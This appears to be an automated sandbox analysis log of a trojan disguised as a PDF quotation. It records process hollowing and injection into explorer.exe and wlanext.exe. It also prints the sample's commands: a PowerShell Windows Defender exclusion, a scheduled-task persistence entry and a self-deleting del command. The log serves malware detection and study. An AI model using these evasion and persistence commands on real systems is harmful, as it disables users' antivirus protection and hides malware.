          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A1C06 mov eax, dword ptr fs:[00000030h]19_2_035A1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566C0A mov eax, dword ptr fs:[00000030h]19_2_03566C0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566C0A mov eax, dword ptr fs:[00000030h]19_2_03566C0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566C0A mov eax, dword ptr fs:[00000030h]19_2_03566C0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566C0A mov eax, dword ptr fs:[00000030h]19_2_03566C0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351BC2C mov eax, dword ptr fs:[00000030h]19_2_0351BC2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B8CD6 mov eax, dword ptr fs:[00000030h]19_2_035B8CD6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A14FB mov eax, dword ptr fs:[00000030h]19_2_035A14FB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566CF0 mov eax, dword ptr fs:[00000030h]19_2_03566CF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566CF0 mov eax, dword ptr fs:[00000030h]19_2_03566CF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03566CF0 mov eax, dword ptr fs:[00000030h]19_2_03566CF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F849B mov eax, dword ptr fs:[00000030h]19_2_034F849B
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0040ACE0 LdrLoadDll,11_2_0040ACE0
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 8C0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeMemory written: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3424Jump to behavior
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exe
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KHDScDG" /XML "C:\Users\user\AppData\Local\Temp\tmp2DBB.tmpJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess created: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe"Jump to behavior
          Source: explorer.exe, 0000001A.00000000.933779947.00000000004C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.972145544.00000000004C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GProgman
          Source: explorer.exe, 0000000D.00000000.748886888.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.815138402.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.764707107.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 0000000D.00000000.749118501.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.784309872.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.818058710.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.765010768.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000D.00000000.788437587.0000000005E50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.749118501.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.784309872.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.818058710.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.765010768.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.941915708.0000000004890000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.973945756.0000000004890000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000D.00000000.749118501.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.784309872.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.818058710.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.765010768.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.941915708.0000000004890000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.973945756.0000000004890000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000D.00000000.749118501.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.784309872.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.818058710.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.765010768.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000D.00000000.757932990.000000000A716000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.772378889.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: explorer.exe, 0000001A.00000000.939303003.0000000004549000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.918656126.000000000455D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.918996216.000000000455D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.973826164.0000000004549000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanR
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
